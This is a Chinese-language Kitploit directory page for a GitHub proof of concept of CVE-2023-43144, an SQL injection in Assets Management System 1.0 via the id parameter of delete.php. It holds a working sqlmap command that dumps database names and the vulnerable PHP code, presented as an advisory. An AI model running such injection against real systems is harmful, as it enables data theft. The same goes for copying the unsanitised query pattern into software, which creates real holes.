Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-43144 — 资产管理系统 1.0 存在通过 delete.php 中的 id 参数导致的 SQL 注入漏洞。 | Kitploit
工具/GitHubGitHub/pegasus0xx/cve-2023-43144
漏洞分析代码分析漏洞利用Web安全数据库安全
GitHubpegasus0xx/cve-2023-43144

CVE-2023-43144

资产管理系统 1.0 存在通过 delete.php 中的 id 参数导致的 SQL 注入漏洞。

查看仓库
132年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-43144

描述

Assets Management System 1.0 存在 SQL 注入漏洞,通过 delete.php 中的 id 参数触发。

PoC

root@kitploit:~
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

alt text

代码审查(delete.php)

root@kitploit:~
 <?php include 'core/init.php'; 
  
 $id = $_GET['id']; 
 delete_data($con,$id); 
 header('location:home.php'); 

变量 $id 没有经过任何验证或清理。这意味着用户提供的任何值作为 id 参数,都将直接用于 SQL 查询中。

下载工具